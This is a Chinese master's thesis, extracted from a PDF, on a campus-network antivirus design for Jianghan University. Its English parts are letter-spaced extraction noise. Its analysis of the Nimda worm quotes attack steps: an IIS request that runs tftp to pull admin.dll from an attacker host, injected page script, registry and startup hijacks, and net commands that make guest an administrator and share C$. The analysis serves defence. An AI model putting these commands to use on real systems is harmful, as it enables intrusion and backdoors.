已阅读5页,还剩51页未读, 继续免费阅读
(通信与信息系统专业论文)江汉大学校园网防病毒系统的设计和实施.pdf.pdf 免费下载
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
华中科技大学硕士学位论文 摘要 随着i n t e m e t 的迅猛发展,计算机病毒的传播频率、传播速度也越来越快,目前 病毒已经成为网络安全最突出的隐患之。为了满足日盏增长的安全需求,迫切需要 一个整体的防病毒方案来保护整个校园网络的安全和稳定。 目前网络环境下的计算机病毒越来越向“多样化”发展,多样化表现在传播途径 的多样化、功能的多样化、危害的多样化。本文以典型的网络蠕虫病毒n i m d a 为例, 对校园网计算机病毒的入侵途径进行了分析,并通过对校园网已采取的安全措施一防 火墙的分析,提出了校园网具体的防毒需求。 针对防毒需求提出了“层层设防、集中控管、以防为主、防治结合”的立体的防 病毒解决方案。对网络中所有可能的病毒攻击点进行保护,以对这些易攻击点逐一加 固的方法,来切断病毒来源,使病毒无可乘之机。方案包括邮件系统的防护、校园网 中核心服务器的防护、桌面p c 和笔记本电脑的防护。 通过对邮件系统的防护,切断了病毒通过邮件的入侵途径、防止了垃圾邮件的随 意传播、有效地保护了邮件服务器受d o s 等攻击。 通过对服务器的防护实现了对校园网中的核心设备及重要数据的保护,防止了病 毒在校园网中通过服务器客户机的模式进行传播。 通过多桌面p c 和笔记本电脑的防护,在整个校园网内实现了集中控管、全网统 一杀毒及病毒码同步升级。 该解决方案的实施为江汉大学校园网提供了全面的病毒防护,保障了校园网的高 效、稳定、安全运行。 关键词:计算机病毒 校园网防病毒 i j 华中科技大学硕士学位论文 a b s t r a c t w h i l et h er a p i dd e v e l o p m e n to fi n t e m e t ,c o m p u t e rv i r u st r a n s m i t sm o r ea n dm o r ef r e q u e n c ya n d r a p i d l y a tp r e s e n t ,v i r u sh a sb e e no n eo ft h em o s tp r o m i n e n th i d d e nt r o u b l e s i no r d e rt os a t i s f i e dt h e i n c r e a s i n gn e c e s s a r yo fs e c u d t y , w en e e daw h o l ea n t i v i r u sp l a nt op r o t e c tt h ec a m p u sn e t w o r kt ob e s a f ea n ds t a b i l i t y n o w a d a y sc o m p u t e rv i r u s e si nn e t w o r k h a v eb e c o m i n gm o r ea n dm o r ev a r i e t y t h ev a r i e t y p r e s e n t sa sv a r i e t ys p r e a d i n gr o u t e ,v a r i e t yf u n c t i o na n dv a r i e t yd a n g e r o u s u s i n gt h et y p i c a ln e t w o r k w o r mv i r u s n i d m d a ”f o re x a m p l e t h i st h e s i sa n a l y s e st h ei n b r e a k i n gm e t h o d so fc a m p u sc o m p u t e r v i r u s e s b ya l s oa n a l y z i n gt h ea d a p t e ds e c u r i t ym e a s u r ef i r e w o r k ,i tp r o p o s e sm a t e r i a la n t i v i r u sr e q u i r e s o fc a m p u s a i ma tr e q u i r e m e n to fp r e v e n tv i r u s ,t h et h e s i sp u t sf o r w a r da n t i v i r u sr e s o l v i n gt h r e e d i m e r t s i o n a l p r o j e c t “s e l _ t i n gu 口d e f e n s e sl a y e ru p o nl a y e r , c o n t r o l l i n gc o n c e n t r a t e ,g i v i n gp r i o r i t y t op r e v e n t i o n , c o m b i n gp r e v e n t i o na n dc u r e ”r e i n f o r c i n go n eb yo n et h ee a s yu n d e rf i r e dp o i n tt oc u to f ft h ev i r u s r e s o u r c e sa n dt om a k en oo p p o r t u n i t yf o rv i r u s ,w es h o u l db ea b l et op r o t e c ta l lt h ep o i n t sw h i c hs h o u l d b ea t t a c k e db yv i r u s t h ep r o j e c ti n c l u d e sd e f e n s eo fe m a i ls y s t e m ,s a f e t yo ft h en u c l e u ss e r v e ro f c a m p u sn e t w o r k f e n e eo f t a b l ep ca n dn o t e b o o kp c t h r o u g hd e f e n d i n gm a i ls y s t e m s ,w ec u to f fv i r u si n - b r e a k i n g r o u t e sb ye - m a i la n dp r e v e n t g a r b a g em a i ls p r e a d i n go p t i o n a l l ya n dp r o t e c tm a i ls e w e r se f f e c t i v e l yf r o ma r a c k i n gb yd o s w es a f e g u a r dt h ec o r ee q u i p m e n t sa n di m p o r t a n td a t e sb yd e f e n d i n gs e r v e r sa n da v o i dv i r u s e s s p r e a d i n go nc a m p u si nc l i e n t - s e w e rs t y l e b yc o m b i n gm a n yt a b l ep ca n dn o t e b o o kp c ,w er e a l i z et o c o n t r o lc o n c e n t r a t ea n dk i l lv i r u s c o n s o l i d a t e da n du p g r a d ev i r u sc o d es y n c h r o n i z a t i o ni nt h ew h o l ec a m p u sn e t w o r k i m p l e m e n tt h er e s o l v ep r o j e c t w ep r o v i d ec o m p r e h e n s i v ev i r u sf e n c ef o r t i a n g h a nu n i v e r s i t y c a m p u sn e t w o r ka n de n s u r ei tt ow o r ke f f e c t i v e l y , s t a b i l i t ya n ds a f e k e y w o r d s :c o m p u t e rv i r u s c a m p u sn e t w o r k a n t i v i r u s i 华中科技大学硕士学位论文 月u罱 随着数字化校园的推进,网络在个方面的应用也越来越广泛。校园网用户在享受 网络带来的便捷的同时也面临着网络上各种病毒的威胁。如何建立一个防范体系来有 效地保护网络中的各种资源是网络管理人员必须考虑和解决的问题。 本论文的背景是江汉大学校园网防病毒系统,作者一直参与和主持校园网防病毒 系统的殴计和实施以及日常维护。本文在对校园网病毒入侵途径及防毒需求进行分析 的基础上,提出了校园网防病毒解决方案,并加以实施。最后给出了该解决方案的实 施效果。 独创性声明 本人声明所呈交的学位论文是我个人在导师指导下进行的研究工作及取得的 研究成果。尽我所知,除文中已经标明引用的内容外,本论文不包含任何其他个 人或集体已经发表或撰写过的研究成果。对本文的研究做出贡献的个人和集体, 均已在文中以明确方式标明。本人完全意识到本声明的法律结果由本人承担。 学位论文作者签名: 日期:仍4 月w 日 学位论文版权使用授权书 本学位论文作者完全了解学校有关保留、使用学位论文的规定,即:学校有 权保留并向国家有关部门或机构送交论文的复印件和电子版,允许论文被查阅和 借阅。本人授权华中科技大学可以将本学位论文的全部或部分内容编入有关数据 库进行检索,可以采用影印、缩印或扫描等复制手段保存和汇编本学位论文。 保密口,在年解密后适用本授权书。 本论文属于, 不保密b ( 请在以上方框内打“4 ”) 学位论文作者貉萨 指导蝴签名: 日期: o f 年夕月曲日日期:矿r 车4 月袱 , 彪 尹 华中科技大学硕士学位论文 1 1 计算机病毒 1 概述 1 1 1 计算机病毒的发展 1 9 8 3 年1 1 月3 日,弗雷德科恩博士研制出一种在运行过程中可以复制自身的 破坏性程序。1 9 8 4 年9 月,在国际信息处理联合会计算机安全技术委员会上,弗雷德科 恩首次公开发表了论文计算机病毒:原理和实验,提出了计算机病毒的概念。这 是病毒的实验室雏形。 1 9 8 6 年初巴基斯坦有的两个以编码为生的兄弟,为了打击盗版软件的使用者, 编写了一个名为大脑( c b r a i n ) 的病毒,该病毒只传染软盘引导。这是世界上流行的第 一个病毒。 1 9 8 8 年1 1 月3 日出现的m o r r i s 蠕虫,具有重要里程碑意义,它标志着全球首个 具有主动攻击特征的网络蠕虫的出现。后来出现的各类传染性极强、破坏力极大的蠕 虫,都是仿造了莫里斯蠕虫,以至于人们将该病毒的编制者r o b e r tt a p p a nm o r r i sj r 称为“蠕虫之父”。 而2 0 0 1 年9 月1 8 日出现的n i m d a 病毒则是病毒演变过程中的另一个里程碑,它 首次利用了系统中的漏洞对互联网发起攻击,具备了典型的黑客特征。它的出现意味 着,混合着多种黑客手段的病毒从此诞生。随后一浪高过一浪的漏洞型病毒充分证明 了这一点:s l a m m e r 、b l a s t e r 、s a s s e r 短短的2 0 多年,全球病毒数量每年都在疯狂增长,到2 0 0 3 年,全球已经出现8 万多种病毒,而病毒给全球造成的经济损失每年在呈几何级数增长,2 0 0 2 年,病毒给 全球造成了1 3 0 亿美元的损失,而到了2 0 0 3 年,则达到2 8 0 亿美元。 在互联网得到广泛应用之前,计算机病毒通常被囚禁在独立的计算机中,主要依 靠软盘进行传播,要进行广泛传播是比较困难的。然而在互联网普及之后,这些计算 机病毒便可以在全世界范围内互相传播,随时向计算机系统发起攻击。互联网激发了 病毒更加广泛的活力,为世界带来了一次又一次的巨大灾难。 华中科技大学硕士学位论文 1 1 2 计算机病毒的定义 计算机病毒从它诞生之日起到现在,已成为了当今信息社会的一个癌症,它随着 计算机网络的发展,已经传播到信息社会的每一个角落,并大肆破坏计算机数据、改 变操作程序、摧毁计算机硬件,给人们造成了重大损失。 计算机病毒实际上是就是一个程序,一段可执行的程序代码。但是这个程序像生 物病毒一样具有独特的复制能力,能把自身附着在各种类型的正常文件中,使用户难 以察觉和根除它。当被感染的文件被用户复制或从个用户传送到另一个用户时,它 们就随同文件,很快地从一台计算机蔓延到另一台计算机。 1 9 9 4 年2 月1 8 日,我国正式颁布实施了中华人民共和国计算机信息系统安全 保护条例,在条例第二十八条中明确指出:“计算机病毒,是指编制或者在计算 机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一 组计算机指令或者程序代码。”这个定义指出了计算机病毒的本质和最基本的特征。”1 随着i n t c m e t 技术的发展,计算机病毒的定义也在发生变化,与计算机病毒的特 征和危害有类似之处的“特洛伊木马”等网络安全方面的问题,现已归属计算机病毒 的范畴。”1 1 1 3 计算机病毒的分类 按照计算机病毒的特点及特性,计算机病毒的分类方法有许多种。 1 ) 按照计算机病毒攻击的系统分类 ( 1 ) 攻击d o s 系统的病毒。这类病毒出现最早、最多,变种也最多。 ( 2 ) 攻击w i n d o w s 系统的病毒。由于w i n d o w s 正逐渐取代d o s ,从而成为病毒攻 击的主要对象。 ( 3 ) 攻击u n i x 系统的病毒。 2 ) 按照计算机病毒的破坏情况分类 按照计算机病毒的破坏情况可分两类: ( 1 ) 良性计算机病毒 良性病毒是指其不包含有立即对计算机系统产生直接破坏作用的代码。这类病毒 为了表现其存在,只是不停地进行扩敖,从一台计算机传染到另一台,并不破坏计算 机内的数据。 ( 2 ) 恶性计算机病毒 华中科技大学硕士学位论文 恶性病毒就是指在其代码中包含有损伤和破坏计算机系统的操作,在其传染或发 作时会对系统产生直接的破坏作用。 3 ) 按照传染方式不同,病毒可分为引导型病毒、文件型病毒和混合型病毒3 种。 【l 】 ( 1 ) 引导型病毒 引导型病毒是指开机启动时,病毒在d o s 的引导过程中被引入内存,它先于操 作系统,所依靠的环境是b i o s 中断服务程序。引导区是磁盘的一部分,它在开机启 动时控制计算机系统。引导型病毒正是利用了操作系统的引导区位置固定,且控制权 的交换方式是以物理地址为依据,而不是以操作系统引导区内容为依据这一特点,因 而病毒占据该物理位置既可获得控制权,而将真正的引导区内容进行转移或替换,待 病毒程序被执行后,再将控制权交给真正的引导区内容,使得这个带病毒的系统看似 正常运转,而病毒已经隐藏在系统中等待传染和发作。 ( 2 ) 文件型病毒 文件型病毒依靠可执行文件,即文件扩展名为c o m 和e x e 等的程序,它 们存放在可执行文件的头部或尾部。目前绝大多数病毒都属于文件型病毒。 将病毒的代码加载到运行程序的文件中,只要运行该程序,病毒就会被激活,引 入内存,并占领c p u 得到控制权。病毒会在磁盘中寻找未被感染的可执行文件,并 将自身放入其首部或尾部,修改文件的长度使病毒程序合法化,它还修改该程序,使 该文件执行前首先挂靠病毒程序,在病毒程序的出口处再跳向原程序开始处,这样就 使该执行文件成为新的病毒源。已感染病毒的文件执行速度会减缓,甚至完全无法执 行,甚至有些文件遭感染后,一执行就会被删除。 文件型病毒依附在不可执行文件中是没有意义的,只有运行可执行程序时病毒才 能调入内存运行。 4 ) 按照传播媒介分类 按照计算机病毒的传播媒介来分类,可分为单机病毒和网络病毒。 ( 1 ) 单机病毒 单机病毒的载体是磁盘,常见的是病毒从软盘传入硬盘感染系统,然后再传染 其他软盘,软盘又传染其他系统。 ( 2 ) 网络病毒 网络病毒的传播媒介不再是移动式载体,而是网络通道,这种病毒的传染能力更强, 华中科技大学硕士学位论文 破坏力更大。 1 2 我国反病毒技术的发展 我国计算机反病毒技术的研究和发展,是从研制防病毒卡开始的。防病毒卡的核心 实际上是一个软件,只不过是将其固化在r o m 中。它的出发点是以不变应万变,通过 动态驻留内存来监视计算机的运行情况,根据总结出来的病毒行为规则和经验来判断是 否有病毒活动,并可以通过截获中断控制权来使内存中的病毒瘫痪,使其失去传染其他 文件和破坏信息资料的能力,这就是防病毒卡“带毒运行”功能的基本原理。防病毒卡 主要的不足是与正常软件特别是国产软件不兼容,误报、漏报病毒时有发生,降低了计 算机运行速度,升级困难等。从防病毒技术上来说也是不成熟的,企图以一种不变的技 术对付万变病毒是不可能的。防病毒卡的动态监测技术、病毒行为规则的研究,对于发 现计算机病毒引起了很大的作用,这些技术是防病毒卡的精华。但是,作为一个产品, 只有这部分技术是远远不够的,且这部分技术实际意义不大,所以很少使用”1 。 随着防病毒卡的衰落,解病毒软件日益盛行。解病毒软件最重要的功能是将病毒 彻底消除1 4 1 o 第一代反病毒技术是采取单纯的病毒特征判断,将病毒从带毒文件中清除掉。这 种方式可以正准确地清楚病毒,可靠性很高。随着病毒技术的发展,特别是加密和变 形技术的运用,使得这种简单的静态扫描方式失去了作用。 第二代反病毒技术是采用静态特征扫描方法检测病毒,这种方式可以更多地检测出 变形病毒,但误报率也很高,尤其是采用这种不严格的特征判定方式去清除病毒带来的 风险性很大,容易造成文件和数据的破坏。所以静态防病毒技术也有难以克服的缺陷。 第三代反病毒技术的主要特点是将静态扫描技术和动态仿真跟踪技术结合起来, 将查找病毒和清除病毒合二为一,形成一套整体解决方案,能够全面实现防、查、消 等反病毒所必备的各种手段,以驻留内存方式防止病毒的入侵,凡是检测到的病毒都 能清除,不会破坏文件和数据。随着病毒数量的增加和新型病毒技术的发展,静态扫 描技术将会使查毒软件运行速度降低,驻留内存防毒模块容易产生误报。 第四代反病毒技术则是针对计算机病毒的发展而基于病毒家族体系的命名规则、 基于多位c r c 校验和扫描机理,启发式智能代码分析模块、自身免疫模块等先进的 解毒技术,较好地解决了以前防毒技术顾此失彼的状态。 4 华中科技大学硕士学位论文 2 校园网的防毒需求分析 随着i n t e m e t 的迅猛发展,计算机病毒的传播频率、传播速度也越来越快,病毒 已经真正的超越了国界,通过i n t e r a c t 病毒可以在瞬间之内传遍世界每一个角落。目 前病毒已经成为网络安全最突出的隐患之一。 为了满足日益增长的安全需求,追切需要一个整体的防病毒方案来保护整个校园 网络的安全和稳定。 2 1 网络现状 江汉大学校园网络,包括两个出口:一个是电信出口,通过3 0 兆链路连接,通 过此出口可以直接到达i n t e m e t ,该出口也能够到达教育网;二是教育网出口,通过 此出口可以访问教育网上的资源。 江汉大学网络拓扑结构图如下: 图2 - 1江汉大学校园网主干拓扑结构图 华中科技大学硕士学位论文 江汉大学校园网为星形拓扑结构,主干网采用具有路由功能的千兆交换以太网 ( g i g a b i te t h e m e t ) 、主干设备能满足约1 0 ,0 0 0 用户接入访问的要求。网络核心层由 c i s c 0 6 5 0 9 组成;分布层则使用了c i s c 0 3 5 5 0 和4 0 0 6 来满足各主体建筑的数据通讯 需要;而接八层则全部采用c i s c 0 3 5 0 0 系列产品来完成终端用户的接入,校园网的 边界路由器为c i s c 0 7 2 0 6 。 在校园网的建设上采用光纤连接,以网络中心为中心用单模1 2 芯光纤连接其他1 7 栋主体建筑;每栋楼又根据信息点的分布情况适当设有楼层配线间,其与主设备间连 接则使用多模6 芯光纤+ s u p e rc a t 5 双绞线连接;所有信息点均采用s u p e rc a t 5 双 绞线连接。 校园网提供以下主要网络服务: ( 1 ) 提供与i n t e m e t 的访问; ( 2 ) 文件共享、办公自动化: ( 3 ) w w w 服务、d n s 服务、 ( 4 ) 电子邮件服务; ( 5 ) 文件数据的统一存储; 江汉大学现有校园网络是复杂、 多。 电影服务远程教学等 多功能的综合网络,分布范围广,并且接点数众 为了保证整个网络的安全,现有安全措施主要是在校园网络的入口处部署了一台 防火墙。 2 2 校园网病毒入侵分析 由于校园网通过c e r n e t 、c h i n a n e t 与外网相连,很可能会受到外网中的不 安全因数的影响,产生病毒传播、黑客攻击、网络非法访问等安全问题。同时,校园 网连接的除了学校的各学院、系等教学行政单位网络,还连接校内的学生机器,也面 临着来自内部的病毒破坏与一些内部用户的非法访问等。 在校园网建设初期考虑了网络的安全性问题,在网络的入口处安装了一台北京天 融信公司的网络卫士n g f w 4 0 0 0 s 。 想对病毒进行防御应首先分析它的特点以及它是使用那些方式进行入侵,针对这 些特点及入侵途径再采取相关的防御措施才能有效的保护相关资源。 下面以典型的网络病毒“尼姆达”为例,分析网络环境下病毒的特点和传播途径, 华中科技大学硕士学位论文 在结合已采取的防御措施防火墙的安全性来确定校园网的防毒需求。 2 2 1 尼姆达病毒分析 尼姆达病毒可以说是集网络传播技术之大全的一款病毒,就是说通过多种方式进 行传播,几乎包括目前所有流行病毒的传播手段,它不仅感染运行w i n d o w s9 5 、9 8 、 m e 和2 0 0 0 的p c 机,还感染运行w i n d o w s2 0 0 0 的服务器。感染了该病毒的系统一 般具有以下几个主要特征:m 1 在c :、d :、e :系统盘下以及其它目录下有很多a d m i n d l l 文件。 存在大量的t e a t i m e e m l 或者r e a d m e n w s 文件,这些文件中带有经过m i m e 格式编码的蠕虫拷贝文件。它们利用了微软i e 异常处理m i m e 头漏洞,用户 在浏览( 有时仅仅是预览) 这些文件时,便会使可执行文件自动下载打开。 存在大量的f i e h e d 2 0 d l l 文件,一般出现在w i n d o w s 系统文件夹里,还可能出 现在任何有 d o c 文件的文件夹里。由于w i n w o r d e x e 和w o r d p a d e x e 运行时 都要调用该d l l 文件,所以当打开d o c 文件时就等于运行了n i m d a 。 w i n d o w s s y s t e m 目录下有l o a d c x e 文件。 在w i n d o w s 临时目录下存在很多名为“m e p * t m p e x e ”的文件。 c 盘被设为共享,共事名为c $ 。 g u e s t 用户被激活并被加到管理员组。 蠕虫激活后主要进行如下活动:传播、系统感染、安装后门。 1 ) 传播 该病毒传播时利用了4 个安全漏洞:微软i e 异常处理m i m e 头漏洞;m i c r o s o f ti i s u n i c o d e 解码目录遍历漏洞;m i c r o s o f ti i sc g i 解文件名错误解码漏洞;“c o d e r e d l l ” 和“s a d m i n d i i s ”蠕虫留下的后门程序。使得用户不用点击病毒文件便会感染。 ( 1 ) e m a i l 传播 蠕虫会向被攻击者的邮件地址发送一封携带了蠕虫附件的邮件。该邮件利用了 “微软i e 异常处理m i m e 头漏洞”安全漏洞,任何运行在x8 6 平台下并且使用微软 i e 5 5 s p l 或之前版本( i e 5 0 1 s p 2 除外) 来显示h t m l 邮件的邮件客户端软件,都将自动 执行邮件附件。然后,蠕虫搜索下列文件: 用户i n t e r a c t 临时文件夹中的h t m 和h t m l 文件 用户通过m a p 服务收到的e m a i l 邮件的内容寻找看起来象邮件地址的字符串, 然后向这些地址发送一份包含蠕虫拷贝的邮件。 7 华中科技大学硕士学位论文 ( 2 ) i i s 服务器传播 利用m i c r o s o f ti i su n i c o d e 解码目录遍历漏洞和m i c r o s o f ti i sc g i 文件名错误解 码漏洞可以执行任意系统命令,蠕虫可利用这两个漏洞和以前的蠕虫病毒留下的后门 程序来进行传播,然后随机选择ip 地址来进行攻击。 首先,启动一个t f t p 服务器,监听在u d p 6 9 端口。一旦发现存在这些漏洞的主机, 蠕虫会通过执行类似下列命令来向其发送蠕虫代码: - g e t s c r i d t s r o o t e x e ? e + t f t p ia t t a c k e r l pg e t a d m i n d l lh t t p 1 0 ” ( a t t a c k e r i p 就是正在发起攻击的蠕虫所在的主机ipo 这样被攻击的主机上就产 生了一个蠕虫的拷贝,命名为a d m i n ,d l l 。然后蠕虫会发送类似如下请求来执行蠕虫拷 贝: “g e t s c r i p t s a d m i n d l lh t t p i 0 ” 这也利用了另外一个漏洞- - m i c r o s o f t i i s5 0 系统文件列表权限提升漏洞。如果任 何可执行文件的名字与i i s 系统文件名列表中的文件匹配,则当它通过i i s 被执行时就 会在i i s 进程空间中运行,也就是以系统权限执行。而a d m i n d l l 就是f r o n t p a g e 扩展中 所带的一个动态链接库,它刚好在i i s 系统文件列表中。a d m i n d l l 运行时,它会把自己 复制到w i n d o w s 文件夹命名为i t l m c e x e ,然后运行。 ( 3 ) 浏览被篡改的网页传播 蠕虫在整个硬盘中搜索后缀为:“h t m l ”、“a s p ”、“h t m ”、,文件名为:“d e f a u l t ”、 “i n d e x ”、“m a i l ”、“r e a d m e e m l ”的文件。一旦发现了这样的文件,蠕虫会在该目录下 创建一个r e a d m e e m l 文件。然后蠕虫会在找到的文件的末尾增加如下j a v a s c d p t 代码: w i n d o w o p e n ( ”r e a d m e e m l ”, n u l l , ”r e s i z a b l e = n o ,t o p = 6 0 0 0 ,l e f t = 6 0 0 0 ”) 这样,其他用户只要浏览这些被修改的网页,蠕虫就可以传播到新的客户端上。 ( 4 ) 文件共享传播 蠕虫访问共享网络资源,然后开始检测远程系统上的文件。如果发现一个e x c 文件 它将蠕虫代码加到原来文件的前面。下次执行被感染文件时将首先执行蠕虫代码。如 果发现d o c 文件,它将自己拷贝到d o c 文件所在目录下,由于w i n w o r d 在打开该d o c 文件时,会首先在当前目录寻找r i c h e d 2 0 d l l ,这样便会运行蠕虫代码。 2 ) 系统感染 蠕虫运行时,会检查注册表中的如下表项: 华中科技大学硕士学位论文 h k e yl o c a lm a c h i n e s o f t w a r e l m i c r o s o f t w i n d o w s c u r r e n t v e r s i o n k a p p p a t h s h k e yl o c a lm a c h i n e s o f t w a r e l m i c r o s o f t w i n d o w s c u r r e n t v e r s i o n e x p l o r e r s h e l lf o l d e r s 然后感染所有找到的程序。同时,蠕虫还会将自身拷贝到w i n d o w s s y s t e m 目录中,命 名为l o a d e x e ,并修改s y s t e m i n i 文件,将s h e l l 部分改为如下内容: s h e l l2 e x p l o r e r e x el o a d e x e d o n t r u n o l d 这样每次系统重启后都会运行蠕虫拷贝。它还会用自身的拷贝替换w i n d o w s 目 录下的r i c h r d 2 0 d 1 1 这样下次执行w i n w o r d 时会自动执行这个蠕虫。 蠕虫在第一次执行时会寻找“e x p l o r e r ”进程,将自己的进程注册为“e x p l o r e r ” 的一个远程线程。这样即使用户退出系统,蠕虫仍然可以继续执行。 3 ) 安装后门 n i m u d a 蠕虫会修改一些注册表项以降低系统安全性,同时也安装了后门。蠕虫会 将所有驱动器设置成共享状态,它首先编辑如下注册表项: h k l m s o f t w a r e m i c r o s o r w i n d o w s c u r r e n t v b r s i o n n e t w o r k l a n m a n c $ 一 z $ 】 然后,蠕虫会删除下列注册表项的所有子键以禁止共享安全性: h k l s y s t e m c u r r e n t v e r s i o n s e r v i c e 虬心m a n s e r v e r s 慨s s e c u r i t y 最后,蠕虫会修改下列注册表项: 调整h i d d e n ,s h o w s u p e r h i d d e n 和h i d e f i l e e x e 键值,使得使用资源管理 器无法显示隐藏文件。这可以保护蠕虫代码不被发现。对于w i n d o w s 2 0 0 0 x p 用户, 蠕虫将执行下列命令,激活g u e s t 用户,将其密码设置为空,并将其加入到a d m i n i s t r a t o r s 组中: n e tu s e rg u e s t a d d n e tu s e rg u e s t a c t i v e n e tu s e rg u e s t n e tl o c a l g r o u pa d m i n i s t r a t o r s n e tl o c a l g r o u pg e s tgg u e s t a d d 然后执行下列命令,将c :设置为完全共享: n e ts h a r ec $ = c : 9 华中科技大学硕士学位论文 2 2 2 病毒在网络环境下的新特点 综合以上的分析可以发现网络环境下病毒除了具有可传播性、可执行性、隐蔽性、 破坏性等计算机病毒的共性外,还具有一些新的特点: 1 ) 主动通过网络和邮件系统传播 从当前流行的前十位计算机病毒来看,其中九个病毒都可以利用邮件系统和网络 进行传播t8 1 , 例如尼姆达病毒。 2 ) 传播速度极快 由于病毒主要通过邮件、网页等网络手段传播,因此,一种新病毒出现后,可以 迅速通过国际互联网传播到世界各地。如“爱虫”病毒在一、两天内迅速传播到世界 的主要计算机网络,并造成欧、美国家的计算机网络瘫痪哺1 。 3 ) 危害性极大 “爱虫”、“美丽杀”以及c i h 等病毒都给世界计算机信息系统和网络带来灾难性 的破坏。有的造成网络拥塞,甚至瘫痪:有的造成重要数据丢失;还有的造成计算机 内储存的机密信息被窃取;甚至还有的计算机信息系统和网络被人控制1 。 4 ) 变种多 目前,很多病毒使用高级语言编写,如“爱虫”是脚本语言病毒,“美丽杀”是 宏病毒。因此,它们容易编写,并且很容易被修改,生成很多病毒变种。这些变种的 主要传染和破坏的机理与母本病毒一致。只是某些代码作了改变。 5 ) 难于控制 利用网络传播、破坏的计算机病毒,一旦在网络中传播、蔓延,很难控制。往往 准备采取防护措施时侯,可能已经遭受病毒的侵袭。除非关闭网络服务,但是这样做 很难被人接受,同时关闭网络服务可能会蒙受更大的损失。 6 ) 具有病毒、蠕虫和后门( 黑客) 程序的功能 计算机病毒的编制技术随着网络技术的普及和发展也在不断提高和变化。过去病 毒最大的特点是能够复制自身给其他的程序。现在,计算机病毒具有了蠕虫的特点, 可以利用网络进行传播,如;利用e m a i l 。同时,有些病毒还具有了黑客程序的功能, 一旦侵入计算机系统后,病毒控制者可以从入侵的系统中窃取信息,远程控制这些系 统。呈现出计算机病毒功能的多样化,因而,更具有危害性。 由以上分析可知网络环境下的病毒是更容易传播和难以控制,我们想控制它的 传播和破坏,最好的方法是对病毒的入侵渠道和病毒集散地进行防护,让它无法进入 华中科技大学硕士学位论文 校园网,从根本上杜绝病毒的发作和传播。 2 2 3 校园网中病毒的入侵途径 我们将校园网中病毒入侵归纳为以下几种:由i p 入侵、e m a i l 入侵、借助下载 文件入侵、浏览网页时趁机入侵、通过移动的存储介质、通过实时通讯工具入侵等 9 j 。 1 ) i p 地址入侵与攻击 这是最常见也是最典型黑客入侵或攻击上网电脑的渠道,因为i p 地址就象每台 电脑在i n t e r a c t 世界中的门牌号码般,想要进入你的电脑中,当然就必须要先知道 你的门牌号。 2 ) e m a i l 入侵 这是病毒经常使用的入侵方式,最常见的是信件中夹带木马程序、病毒或利用邮 件程序的漏洞夹带病毒、恶意代码或植入木马程序,另外对电子邮件进行轰炸,让你 的电子邮件服务器无法正常工作。 最初通过邮件传播的病毒需要人们主动去发带有病毒附件的邮件,现在病毒已经 会自己将自己发出去了。在激活的情况下,病毒主动读取o u t l o o k 地址本中所有邮 件地址,并将自己向这些邮件地址发送出去。于是,一生几十,几十生成千,病 毒以几何级数通过i n t e r a c t 迅速从一点蔓延到世界各地,造成网络拥塞,邮件服务器 不堪重负而瘫痪。 3 ) 借助下载文件入侵 在i n t e r a c t 世界中下载文件是很常见、普遍的行为,而某些恶意的黑客就可能在 某些软件中夹带木马程序或病毒放在网站或f t p 服务器上让人下载,当用户下载这些 文件时病毒就随文件进入校园网。 4 ) 浏览网页时趁机入侵 在最初的概念中,浏览网页总是安全的,但是,随着浏览器功能的不断增强, 这种安全感已然不再存在。利用w h s ( w i n d o w sh o s ts c r i p t ) , 网页中嵌入的有 害脚本代码可以读写用户的本地文件,修改注册表,访问其他系统资源,简直是为 所欲为,典型的例子象最近流行的“混客绝情炸弹”病毒等。还有,潜入网页中的有 害a c t i v e x 及j a v a 程序以及浏览器广泛支持的c o o k i e 都可能带来极为严重的安全 问题。 5 ) 通过移动的存储介质 即指软盘、c d r o m 、z i p 磁盘、移动硬盘等。其中的软盘和活动硬盘是使用较 华中科技大学硕士学位论文 为广泛的存储戒指,因此也就是比其他几种磁盘有更多的传播机会。 6 ) 通过实时通讯工具入侵 现在很多很多用户都在使用 icq qqmsn 等实时通讯工具来进行 联系、交谈等。现在不少人针对这些普遍使用的实时通讯软件设计出相关的工具,来 进行入侵、获取重要数据或传播病毒。 对以上对校园网病毒入侵途径的分析我们可以知道,若能有效的切断它的几种入 侵途径,应该可以阻挡大部分病毒入侵校园网络。 下面通过对校园网已采取的安全措施一防火墙系统的分析,来确定校园网存在的 安全漏洞与防毒需求。 2 3 校园网防毒需求 2 3 1 已采取的安全措施防火墙 防火墙是指隔离在本地网络与外界网络之间的防御系统。在互联网上防火墙是 一种非常有效的网络安全模型,通过它可以隔离风险区域与安全区域的连接, 同时不会妨碍用户对风险区域的访问。防火墙可以监控进出网络的通信量。它只让 安全、核准的信息进入,同时抵制对企业有威胁的数据。由于对网络的入侵不仅来 自高超的攻击手段,也可能来自配置上的低级错误或不合适的密码选择。因此,防 火墙可以防止不希望的、未授权的通信进出被保护的网络,使得单位可以加强自己 的网络安全。 在逻辑上,防火墙是一个分离器、一个限制器,同时也是一个分析器,有效地监 控了内部网和im e m e t 之间的任何活动,确保了内部网络的安全。 防火墙系统提供多种网络接口,标准配置的三个接口分别为:i n t r a n e t ( 内部网) 、 d m z ( d e m i l i t a r i z e dz o n e ) 以及外部网。其中i n t r a n c t 是不对外开放的区域,外部用 户检测不到它的i p 地址,难以对它进行攻击,d m z 区又称为停火区,或安全网络 ( s s n ) ,它对外提供服务,系统的开放信息都放在该区( 如h t t p 、s m t p 、d n s 、 f t p 等) 。由于d m z 和内部网是互相隔离的,所以即使受到攻击也不会危及内部网。 这种安全的体系结构使得i n t r a n e t 、d m z 和外部网分工明确,界限分明,防止因其中 一部分瘫痪而影响整个网络。 校园网中防火墙的部署示意图如下: 华中科技大学硕士学位论文 图2 - 2 防火墙部署示意倒 防火墙将江汉大学内部网络与i n t e m e t 隔离成三个区域,即公共网区域、d m z 区 域( 即主干交换机和服务器区域) 、江汉大学内部网络区域。 各个网络区域之间配置的访问策略如下: 1 ) 对于外部用户: 允许江汉大学内部局域网用户和不设防区上的用户访问公共网络上的所有服务, 拒绝所有外部i n t e m e t 用户对江汉大学内部局域网资源的访问。 下列服务被d m z 区域所拒绝:b o o t p - c l i e n t 、b o o t p s e r v e r 、f i n g e r 、r t e l n e t 、s n m p 、 s n m p t r a p s 、t e l n e t 、t f t p 等。 2 ) 对于d m z 区域: 允许来自江汉大学内部局域网上的所有服务的访问。 拒绝来自公共网络的下列服务的访问:b o o t p c l i e n t 、b o o t p s e r v e r 、f i n g e r 、 r t e l n e t 、s n m p 、s n m p t r a p s 、t e l n e t 、t f t p 